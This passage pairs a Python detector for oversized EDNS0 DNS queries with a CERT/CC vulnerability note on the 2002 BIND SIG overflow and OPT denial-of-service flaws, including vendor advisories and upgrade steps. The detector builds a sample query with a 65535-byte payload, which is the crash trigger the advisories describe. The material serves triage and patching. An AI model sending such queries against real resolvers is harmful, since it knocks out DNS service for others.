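def skip_name(pkt: bytes, off: int) -> int:
    """Return the offset just past the name at `off` (handles compression pointers)."""
    while True:
        if off >= len(pkt):
            raise ValueError("truncated name")
        length = pkt[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # two-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def opt_payload_size(pkt: bytes) -> Optional[int]:
    """Walk the message and return the UDP payload size from the first OPT RR,
    or None when the query carries no EDNS0 OPT record."""
    if len(pkt) < 12:
        raise ValueError("short DNS header")
    qd, an, ns, ar = struct.unpack("!HHHH", pkt[4:12])
    off = 12
    for _ in range(qd):
        off = skip_name(pkt, off) + 4  # QTYPE + QCLASS
    for _ in range(an + ns + ar):
        off = skip_name(pkt, off)
        if off + 10 > len(pkt):
            raise ValueError("truncated resource record")
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        if rtype == OPT_TYPE:
            return rclass  # for OPT, the CLASS field is the UDP payload size
        off += 10 + rdlen
    return None


def is_large_edns_query(pkt: bytes, threshold: int = LARGE_PAYLOAD_THRESHOLD) -> bool:
    """True when the query advertises an EDNS0 payload size above `threshold`."""
    size = opt_payload_size(pkt)
    return size is not None and size > threshold


# Constructed sample queries (assumption: not captured traffic)
PLAIN = build_query("does-not-exist.example.com")
NORMAL_EDNS = build_query("does-not-exist.example.com", udp_payload=1280)
OVERSIZED_EDNS = build_query("does-not-exist.example.com", udp_payload=65535)

if __name__ == "__main__":
    for label, q in [("plain", PLAIN), ("edns 1280", NORMAL_EDNS), ("edns 65535", OVERSIZED_EDNS)]:
        print(f"{label:11} payload={opt_payload_size(q)} flagged={is_large_edns_query(q)}")
```

The parser walks the question section by name length rather than assuming a fixed offset, so it also handles captures where the OPT record sits behind other additional-section records. Note that a large advertised size is a legitimate EDNS0 setting for many clients, so the threshold is a triage hint for a BIND 8 resolver that cannot yet be upgraded, not proof of an attack.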
\n\n\nThe following versions of BIND are affected: \n \n\\- BIND versions 4.9.5 to 4.9.10 \n\\- BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3 \n \n--- \n \n### Impact \n\nA remote attacker could execute arbitrary code on the nameserver with the privileges of the _named_ uid, typically root. \n \n--- \n \n### Solution \n\n[Upgrade](<http://www.isc.org/products/BIND>) to BIND 4.9.11, BIND 8.2.7, BIND 8.3.4, or BIND 9. \n \n--- \n \nOne interim workaround is to disable recursion on vulnerable servers. \n \n--- \n \n### Vendor Information\n\n852283\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server with BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server \n \nThis is addressed in Security Update 2002-11-21 \n\n\n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Conectiva __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n` 
\n`PACKAGE : bind \nSUMMARY : Remote vulnerabilities in the BIND DNS server \nDATE : 2002-11-14 15:36:00 \nID : CLA-2002:546 \nRELEVANT \nRELEASES : 6.0 \n` \n`- ------------------------------------------------------------------------- \n` \n`DESCRIPTION \n\"bind\" is probably the most used DNS server on the internet. \n` \n` ISS reported[7] buffer overflow and denial of service vulnerabilities \nin some versions of the BIND software. The most dangerous one, the \nbuffer overflow, could be used by a remote attacker to execute \narbitrary code on the server with the privileges of the user running \nthe \"named\" process. \n` \n` The vulnerabilities explained below affect BIND as shipped with \nConectiva Linux 6.0. Conectiva Linux 7.0 and 8 already ship BIND 9.x, \nwhich is not vulnerable to the problems reported by ISS. \n` \n` 1) Buffer overflow (CAN-2002-1219) [5] \nAn attacker who can make a vulnerable BIND server make recursive \nqueries to a domain that he (the attacker) controls can exploit this \nvulnerability and execute arbitrary code on the server with the same \nprivileges as the \"named\" process. The BIND packages in Conectiva \nLinux run the \"named\" process with an unprivileged user, and not \nroot, which mitigates the impact of this vulnerability somewhat, \nrequiring that the attacker take further steps to obtain root access. \nAdditionally, there is the bind-chroot package which, if used, runs \nthe server in a chroot area under /var/named which imposes an \nadditional restriction on the actions a potential intruder can take. \n` \n` 2) Denial of service (CAN-2002-1221) [6] \nThe BIND server can be triggered into attempting a NULL pointer \ndereference which will terminate the service. This can be caused by a \nremote attacker who controls a DNS server authoritative for some \ndomain queried by the vulnerable BIND server. 
\n` \n \n` The packages available through this advisory were built with patches \nthat were made publicly available[3] by ISC less than 24 hours ago. \nConectiva Linux and the majority of other GNU/Linux distributions \nwere notified about this vulnerability (but with not enough details \nto produce a patch) about 12 hours before ISS made it public[7]. We \nare worried about the way in which this whole incident has been \nhandled, especially when considering that DNS is part of the internet \ninfrastructure and thus a vital service. \n` \n` We, and many vendors, do believe in what is commonly called \n\"responsible full disclosure\"[8], where all details about a \nvulnerability are made public after all vendors were notified in \nadvance and have had a reasonable amount of time to prepare and test \nupdated packages. We believe this to be the most secure and \nresponsible method for disclosing vulnerabilities. \n` \n \n`SOLUTION \nAll BIND users should upgrade immediately. After the upgrade, the \nnamed service will be automatically restarted if needed. \n` \n` If it is not possible to upgrade the packages immediately, users \nshould disable recursive queries or restrict them. Disabling \nrecursive queries can be done by the \"recursion no;\" parameter in the \noptions section of the named.conf configuration file. Restricting \naccess to such queries can be accomplished via the \"allow-recursion\" \ndirective in the same configuration file. 
\n` \n \n` REFERENCES \n1.http://www.isc.org/ \n2.http://www.cert.org/advisories/CA-2002-31.html \n3.http://www.isc.org/products/BIND/patches/bind826.diff \n4.http://www.isc.org/products/BIND/bind-security.html \n5.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1219 \n6.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1221 \n7.https://gtoc.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469 \n8.http://distro.conectiva.com.br/seguranca/problemas/?idioma=en \n` \n \n`DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.6-1U60_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.6-1U60_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.6-1U60_2cl.i386.rpm>`` \n` \n \n`ADDITIONAL INSTRUCTIONS \nUsers of Conectiva Linux version 6.0 or higher may use apt to perform \nupgrades of RPM packages: \n- add the following line to /etc/apt/sources.list if it is not there yet \n(you may also use linuxconf to do this): \n` \n` rpm [cncbr] ``<ftp://atualizacoes.conectiva.com.br>`` 6.0/conectiva updates \n` \n`(replace 6.0 with the correct version number if you are not running CL6.0) \n` \n` - run: apt-get update \n- after that, execute: apt-get upgrade \n` \n` Detailed instructions regarding the use of apt and upgrade examples \ncan be found at ``<http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en>`` \n` \n \n`- ------------------------------------------------------------------------- \nAll packages are signed with 
Conectiva's GPG key. The key and instructions \non how to import it can be found at \n``<http://distro.conectiva.com.br/seguranca/chave/?idioma=en>`` \nInstructions on how to check the signatures of the RPM packages can be \nfound at ``<http://distro.conectiva.com.br/seguranca/politica/?idioma=en>`` \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n``<http://distro.conectiva.com.br/atualizacoes/?idioma=en>`` \n` \n`- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE9099O42jd0JmAcZARAiZGAKDMz0e8eiF+0Zws8sQkvkE5NcHKywCg24tc \nixMwRpolJ8skSz3KyrLfVjM= \n=Smdc \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Debian __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.debian.org/security/2002/dsa-196>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Engarde __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### 
Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`+------------------------------------------------------------------------+ \n| EnGarde Secure Linux Security Advisory November 14, 2002 | \n| ``<http://www.engardelinux.org/>`` ESA-20021114-029 | \n| | \n| Packages: bind-chroot, bind-chroot-utils | \n| Summary: buffer overflow, DoS attacks. | \n+------------------------------------------------------------------------+ \n` \n` EnGarde Secure Linux is a secure distribution of Linux that features \nimproved access control, host and network intrusion detection, Web \nbased secure remote management, e-commerce, and integrated open source \nsecurity tools. \n` \n`OVERVIEW \n- -------- \nSeveral vulnerabilities were found in the BIND nameserver. The \nvulnerabilities, discovered by ISS, range from buffer overflows to \ndenial of service (DoS) attacks. \n` \n` The summaries below are from the ISS advisory which may be found at: \n` \n` ``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n` \n` * CAN-2002-1219 -- BIND SIG Cached RR Overflow Vulnerability \n` \n` \"A buffer overflow exists in BIND 4 and 8 that may lead to remote \ncompromise of vulnerable DNS servers. An attacker who controls any \nauthoritative DNS server may cause BIND to cache DNS information \nwithin its internal database, if recursion is enabled. Recursion is \nenabled by default unless explicitly disabled via command line \noptions or in the BIND configuration file. Attackers must either \ncreate their own name server that is authoritative for any domain, \nor compromise any other authoritative server with the same criteria. \nCached information is retrieved when requested by a DNS client. 
There \nis a flaw in the formation of DNS responses containing SIG resource \nrecords (RR) that can lead to buffer overflow and execution of \narbitrary code.\" \n` \n` * CAN-2002-1220 -- BIND OPT DoS \n` \n` \"Recursive BIND 8 servers can be caused to abruptly terminate due to \nan assertion failure. A client requesting a DNS lookup on a \nnonexistent sub-domain of a valid domain name may cause BIND 8 to \nterminate by attaching an OPT resource record with a large UDP \npayload size. This DoS may also be triggered for queries on domains \nwhose authoritative DNS servers are unreachable.\" \n` \n` * CAN-2002-1221 -- BIND SIG Expiry Time DoS \n` \n` \"Recursive BIND 8 servers can be caused to abruptly terminate due to a \nnull pointer dereference. An attacker who controls any authoritative \nname server may cause vulnerable BIND 8 servers to attempt to cache \nSIG RR elements with invalid expiry times. These are removed from the \nBIND internal database, but later improperly referenced, leading to a \nDoS condition.\" \n` \n` All users should upgrade as soon as possible. \n` \n`SOLUTION \n- -------- \nUsers of the EnGarde Professional edition can use the Guardian Digital \nSecure Network to update their systems automatically. \n` \n` EnGarde Community users should upgrade to the most recent version \nas outlined in this advisory. Updates may be obtained from: \n` \n` ``<ftp://ftp.engardelinux.org/pub/engarde/stable/updates/>`` \n``<http://ftp.engardelinux.org/pub/engarde/stable/updates/>`` \n` \n` Before upgrading the package, the machine must either: \n` \n` a) be booted into a \"standard\" kernel; or \nb) have LIDS disabled. 
\n` \n` To disable LIDS, execute the command: \n` \n` # /sbin/lidsadm -S -- -LIDS_GLOBAL \n` \n` To install the updated package, execute the command: \n` \n` # rpm -Uvh files \n` \n` You must now update the LIDS configuration by executing the command: \n` \n` # /usr/sbin/config_lids.pl \n` \n` To re-enable LIDS (if it was disabled), execute the command: \n` \n` # /sbin/lidsadm -S -- +LIDS_GLOBAL \n` \n` To verify the signatures of the updated packages, execute the command: \n` \n` # rpm -Kv files \n` \n`UPDATED PACKAGES \n- ---------------- \nThese updated packages are for EnGarde Secure Linux Community \nEdition. \n` \n` Source Packages: \n` \n` SRPMS/bind-chroot-8.2.6-1.0.29.src.rpm \nMD5 Sum: 3c845d09bcbe9b07e5395d75a8686689 \n` \n` Binary Packages: \n` \n` i386/bind-chroot-8.2.6-1.0.29.i386.rpm \nMD5 Sum: 0c1daf47be94ae0fd5a29e4007bf68c2 \n` \n` i386/bind-chroot-utils-8.2.6-1.0.29.i386.rpm \nMD5 Sum: 58e0e54d895b8dc3c6f6b5e9228912fb \n` \n` i686/bind-chroot-8.2.6-1.0.29.i686.rpm \nMD5 Sum: 84cb58f02d228859a2fbda3ed1b46dd5 \n` \n` i686/bind-chroot-utils-8.2.6-1.0.29.i686.rpm \nMD5 Sum: 20fb3e4a34cecb431511308afe027941 \n` \n`REFERENCES \n- ---------- \nGuardian Digital's public key: \n``<http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY>`` \n` \n` BIND's Official Web Site: \n``<http://www.isc.org/products/BIND/>`` \n` \n` Security Contact: security@guardiandigital.com \nEnGarde Advisories: ``<http://www.engardelinux.org/advisories.html>`` \n` \n`- -------------------------------------------------------------------------- \n$Id: ESA-20021114-029-bind-chroot,v 1.4 2002/11/14 10:02:51 rwm Exp $ \n- -------------------------------------------------------------------------- \nAuthor: Ryan W. Maple <ryan@guardiandigital.com> \nCopyright 2002, Guardian Digital, Inc. 
\n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE903h0HD5cqd57fu0RAgQ2AJ4h+6JBMcFRlC3vKwfRi7dnMRE69ACbBQoO \njReNCYKqxnuwuvOLsRqhznY= \n=9v8+ \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### FreeBSD __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:43.bind.asc>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. Temporary patches will be available through an efix package by 11/22/2002 or before. The efix will be available at the following URL:\n\n \n \n<ftp://ftp.software.ibm.com/aix/efixes/security/bind_multiple_efix.tar.Z> \nIn the interim, customers may want to implement the workarounds given in the Solutions section to limit their exposure. 
\n \nThe following APARs will be available in the near future: \n\n\nAIX 4.3.3 APAR IY37088 (available approx 11/27/2002 ) \nAIX 5.1.0 APAR IY37019 (available approx 12/18/2002 ) \nAIX 5.2.0 APAR TBA (available approx TBA ) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### ISC Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MandrakeSoft __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n` \n`________________________________________________________________________ \n` \n` Mandrake Linux Security Update Advisory \n________________________________________________________________________ \n` \n`Package name: bind \nAdvisory ID: MDKSA-2002:077 \nDate: November 14th, 2002 \n` \n`Affected versions: 7.2, Single Network Firewall 7.2 \n________________________________________________________________________ \n` \n`Problem Description: \n` \n` Several vulnerabilities were discovered in the BIND8 DNS server by ISS \n(Internet Security Services), including a remotely exploitable buffer \noverflow. 
The first vulnerability is how named handles SIG records; \nthis buffer overflow can be exploited to obtain access to the victim \nhost with the privilege of the user the named process is running as. \nBy default, Mandrake Linux is configured to run the named process as \nthe named user. To successfully exploit this vulnerability, the \nattacker must control an existing DNS domain and must be allowed to \nperform a recursive query. \n` \n` A possible work-around is to restrict recursive requests, however \nMandrakeSoft encourages all users to upgrade to the provided BIND9 \npackages. You can also completely disable recursion by adding \n\"recursion no;\" to the options section of /etc/named.conf. \n` \n` Several Denial of Service problems also exist in BIND8 that allow \nattackers to terminate the named process. At least one of these \nvulnerabilities seems to be exploitable even when the attacker is \nnot permitted to perform recursive queries, so the work-around noted \nabove is not effective against this DoS. \n` \n` Both problems are not reported to affect BIND9. As Linux-Mandrake \n7.2 and Single Network Firewall 7.2 are the only supported distributions \nto still ship BIND8, we have elected to upgrade to both a patched \nversion of BIND8 and BIND9. The BIND8 packages contain the patch \nISC made available late on the 13th, contrary to their original \nadvisory which called for them to be made available next week. Despite \nthis, however, MandrakeSoft encourages everyone who is able to upgrade \nto BIND9 rather than BIND8. \n` \n` The MandrakeSoft security team wishes to apologize to MandrakeSoft \ncustomers for not being able to provide timely fixes for this problem, \nand regrets the inability of the ISC to work with the Internet community \nat large to provide adequate protection to users of BIND. 
\n________________________________________________________________________ \n` \n`References: \n` \n` ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1219>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1220>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1221>`` \n``<http://www.kb.cert.org/vuls/id/852283>`` \n``<http://www.kb.cert.org/vuls/id/229595>`` \n``<http://www.isc.org/products/BIND/bind-security.html>`` \n``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n________________________________________________________________________ \n` \n`Updated Packages: \n` \n` Linux-Mandrake 7.2: \nf3ca1559f7d2fbe17a2ec6dab327bb7e 7.2/RPMS/bind-8.3.3-2.1mdk.i586.rpm \n0ccd937ec59aa9775f79b05f62d4718c 7.2/RPMS/bind-9.2.1-2.3mdk.i586.rpm \n783ab2327c7e7983a07a8043d3355bbb 7.2/RPMS/bind-devel-8.3.3-2.1mdk.i586.rpm \nbbf717f0f71098ab6c2293d9dbd1c1bd 7.2/RPMS/bind-devel-9.2.1-2.3mdk.i586.rpm \n47a2418adcd190b22956407a667fbc9e 7.2/RPMS/bind-utils-8.3.3-2.1mdk.i586.rpm \n56b9c086c299cdfd367ae87f14db711b 7.2/RPMS/bind-utils-9.2.1-2.3mdk.i586.rpm \ndf34fbecce2e6c61695fcee11a525fea 7.2/RPMS/caching-nameserver-8.1-3.2mdk.noarch.rpm \nf9d914230ec37be01ad4d00abcde0280 7.2/SRPMS/bind-8.3.3-2.1mdk.src.rpm \n8660bd628168c52478b0f766d0ab676c 7.2/SRPMS/bind-9.2.1-2.3mdk.src.rpm \n904b9064763803d24afc79e7140146a4 7.2/SRPMS/caching-nameserver-8.1-3.2mdk.src.rpm \n` \n` Single Network Firewall 7.2: \nf3ca1559f7d2fbe17a2ec6dab327bb7e snf7.2/RPMS/bind-8.3.3-2.1mdk.i586.rpm \n0ccd937ec59aa9775f79b05f62d4718c snf7.2/RPMS/bind-9.2.1-2.3mdk.i586.rpm \n47a2418adcd190b22956407a667fbc9e snf7.2/RPMS/bind-utils-8.3.3-2.1mdk.i586.rpm \n56b9c086c299cdfd367ae87f14db711b snf7.2/RPMS/bind-utils-9.2.1-2.3mdk.i586.rpm \ndf34fbecce2e6c61695fcee11a525fea snf7.2/RPMS/caching-nameserver-8.1-3.2mdk.noarch.rpm \nf9d914230ec37be01ad4d00abcde0280 snf7.2/SRPMS/bind-8.3.3-2.1mdk.src.rpm \n8660bd628168c52478b0f766d0ab676c 
snf7.2/SRPMS/bind-9.2.1-2.3mdk.src.rpm \n904b9064763803d24afc79e7140146a4 snf7.2/SRPMS/caching-nameserver-8.1-3.2mdk.src.rpm \n________________________________________________________________________ \n` \n`Bug IDs fixed (see ``<https://qa.mandrakesoft.com>`` for more information): \n________________________________________________________________________ \n` \n`To upgrade automatically, use MandrakeUpdate. The verification of md5 \nchecksums and GPG signatures is performed automatically for you. \n` \n`If you want to upgrade manually, download the updated package from one \nof our FTP server mirrors and upgrade with \"rpm -Fvh *.rpm\". A list of \nFTP mirrors can be obtained from: \n` \n` ``<http://www.mandrakesecure.net/en/ftp.php>`` \n` \n`Please verify the update prior to upgrading to ensure the integrity of \nthe downloaded package. You can do this with the command: \n` \n` rpm --checksig <filename> \n` \n`All packages are signed by MandrakeSoft for security. You can obtain \nthe GPG public key of the Mandrake Linux Security Team from: \n` \n` ``<https://www.mandrakesecure.net/RPM-GPG-KEYS>`` \n` \n`Please be aware that sometimes it takes the mirrors a few hours to \nupdate. \n` \n`You can view other update advisories for Mandrake Linux at: \n` \n` ``<http://www.mandrakesecure.net/en/advisories/>`` \n` \n`MandrakeSoft has several security-related mailing list services that \nanyone can subscribe to. 
Information on these lists can be obtained by \nvisiting: \n` \n` ``<http://www.mandrakesecure.net/en/mlist.php>`` \n` \n`If you want to report vulnerabilities, please contact \n` \n` security_linux-mandrake.com \n` \n`Type Bits/KeyID Date User ID \npub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n<security linux-mandrake.com> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday \nL4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 \nWKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo \nP0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl \nhynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx \nPFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg \n2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs \niyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD \nLLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu \nZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t \nPohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy \n/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA \nBgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP \nWdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w \nPk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA \nBgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H \n8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K \n+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy \nYWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j \nb20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+ \nAJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E \nOWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ \n9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR 
\nxBXVJb57fFQjxOu4eNjZAtfII/YXb0uyXXrdr5dlJ/3eXrcO4p0XAAMFBACCxo6Z \n269s+A4v8C6Ui12aarOQcCDlV8cVG9LkyatU3FNTlnasqwo6EkaP572448weJWwN \n6SCXVl+xOYLiK0hL/6Jb/O9Agw75yUVdk+RMM2I4fNEi+y4hmfMh2siBv8yEkEvZ \njTcl3TpkTfzYky85tu433wmKaLFOv0WjBFSikohGBBgRAgAGBQI5aefvAAoJEJqo \n0NAiRYqYid0AoJgeWzXrEdIClBOSW5Q6FzqJJyaqAKC0Y9YI3UFlE4zSIGjcFlLJ \nEJGXlA== \n=yGlX \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE9083UmqjQ0CJFipgRAnHHAKCpU7M0s+/oktmfBXt3YmuV0Fk9EgCgxqKw \n0TMmPB4TZgcFOv+PVexxc58= \n=01Zu \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nortel Networks __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"NetID version 4.3.1 and below is affected by the vulnerabilities identified in CERT/CC Advisory CA-2002-31. A bulletin and patched builds are available from the following Nortel Networks support contacts: \n\n \nNorth America: 1-800-4NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \nOptivity NMS is not affected. 
\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nBIND 4.9.10-OW2 includes the patch provided by ISC and thus has the two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND 4.9.x-OW patches, if used properly, significantly reduced the impact of the \"named\" vulnerability. The patches are available at their usual location: \n\n\n \n<http://www.openwall.com/bind/> \nA patch against BIND 4.9.11 will appear as soon as this version is officially released, although it will likely be effectively the same as the currently available 4.9.10-OW2. \n \nIt hasn't been fully researched whether the resolver code in glibc, and in particular on Openwall GNU/*/Linux, shares any of the newly discovered BIND 4 resolver library vulnerabilities. Analysis is in progress. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Red Hat Inc. 
